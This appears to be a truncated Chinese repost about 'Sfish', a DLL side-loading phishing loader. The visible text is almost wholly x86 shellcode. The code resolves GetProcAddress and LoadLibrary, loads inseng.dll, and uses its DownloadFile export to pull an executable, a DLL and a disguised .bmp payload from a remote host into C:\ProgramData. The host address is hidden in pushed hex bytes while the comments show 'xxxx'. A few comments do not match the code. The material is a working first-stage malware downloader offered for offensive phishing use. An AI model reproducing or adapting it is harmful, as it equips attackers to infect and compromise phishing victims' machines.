实战 | Sfish 基于白加黑钓鱼加载器利用工具

正文

请到「今天看啥」查看全文

add esi, ebx nop xor ecx, ecx
get_function: inc ecx ; Increment the ordinal lodsd ; Get name offset add eax, ebx ; Get function name cmp dword ptr[eax], 50746547h ; GetP jnz get_function ; cmp dword ptr[eax + 4h], 41636f72h ; rocA jnz get_function ; cmp dword ptr[eax + 8h], 65726464h ; ddre jnz get_function ; mov esi, [edx + 24h] ; ESI = Offset ordinals add esi, ebx ; ESI = Ordinals table mov cx, [esi + ecx * 2] ; Number of function dec ecx ; mov esi, [edx + 1ch] ; Offset address table add esi, ebx ; ESI = Address table mov edx, [esi + ecx * 4] ; EDX = Pointer(offset) add edx, ebx ; EDX = GetProcAddress
xor ecx, ecx ; ECX = 0 push ebx ; Kernel32 base address push edx ; GetProcAddress push ecx ; 0 push 41797261h ; aryA nop push 7262694ch ; Libr nop push 64616f4ch ; Load push esp ; "LoadLibrary" push ebx ; Kernel32 base address call edx ; GetProcAddress(LL)
add esp, 0ch ; pop "LoadLibrary" pop ecx ; ECX = 0
; 获取inseng.dll模块 push eax ; EAX = LoadLibrary push ecx push 6c6ch ; ll nop push 642e676eh ; ng.d nop push 65736e69h ; inse push esp ; "inseng.dll" call eax ; LoadLibrary("inseng.dll")
add esp, 0ch ; Clean stack pop ecx ;
mov edx, [esp + 4h] ; EDX = GetProcAddress push edx
; GetProcAddress(DownloadFile) 导出函数 xor ecx, ecx ; ECX = 0 push ecx push 656C6946h ; eilF nop push 64616F6Ch ; daol nop push 6E776F44h ; nwoD nop push esp; "DownloadFile" push eax; kernel32.dll address call edx; GetProcAddress(DownloadFile)
add esp, 0ch; Cleanup stack pop ecx; push eax; save DownloadFile function
; DownloadFile("http://xxxx/test.exe", "C:\\ProgramData\\test.exe", 1);
xor ecx,ecx xor ebx,ebx ; http://xxxx/test.exe push 65h ; e nop push 78652E66h ; xe.f nop push 64507573h ; dPus nop push 694A2F33h ; iJ/3 nop push 36312E37h ; 61.7 nop push 30312E33h ; 01.3 nop push 34312E33h ; 41.3 nop push 342F2F3Ah ; 4//: nop push 70747468h ; ptth
; C:\ProgramData\test.exe push 6578h nop push 652e6664h nop push 50757369h nop push 4A5C6174h nop push 61646D61h nop push 72676F72h nop push 705c3a43h push 1 lea ecx, [esp + 4h] push ecx lea ecx, [esp + 24h] push ecx call eax
add esp, 38h ; Cleanup stack mov eax, [esp+4h] ;
; DownloadFile("http://xxx/sqlite3.dll", "C:\\ProgramData\\sqlite3.dll", 1); xor ecx,ecx xor ebx,ebx
; http://xxx/sqlite3.dll push 6Ch ; l nop push 6C642E33h ; ld.3 nop push 6574696Ch ; etil nop push 71732F33h ; qs/3 nop push 36312E37h ; 61.7 nop push 30312E33h ; 01.3 nop push 34312E33h ; 41.3 nop push 342F2F3Ah ; 4//: nop push 70747468h ; ptth
; C:\ProgramData\sqlite3.dll push 6C6Ch ; ll nop push 642E3365h ; d.3e nop push 74696C71h ; tilq nop push 735C6174h ; s/at nop push 61646D61h ; adma nop push 72676F72h ; rgor nop push 705c3a43h ; P/:c push 1 lea ecx, [esp + 4h] push ecx lea ecx, [esp + 24h] push ecx mov eax, [esp + 4ch] call eax
add esp, 38h; Cleanup stack mov eax, [esp+4h]; xor ecx, ecx
; DownloadFile("http://xxx/g.bmp", "C:\\ProgramData\\g.bmp", 1); xor ecx,ecx xor ebx,ebx
; http://xxx/g.bmp push 706d62h ; pmb nop push 2e672F33h ; .g/3 nop push 36312E37h ; 61.7 nop push 30312E33h ; 01.3 nop push 34312E33h ; 41.3 nop push 342F2F3Ah ; 4//: nop push 70747468h ; ptth
; C:\ProgramData\gg.bmp push 70h nop push 6d622e67h nop push 675C6174h nop push 61646D61h nop push 72676F72h nop push 705c3a43h push 1 lea ecx, [esp + 4h] push ecx lea ecx, [esp + 20h] push ecx mov eax, [esp + 40h] call eax
add esp, 34h; Cleanup stack

请到「今天看啥」查看全文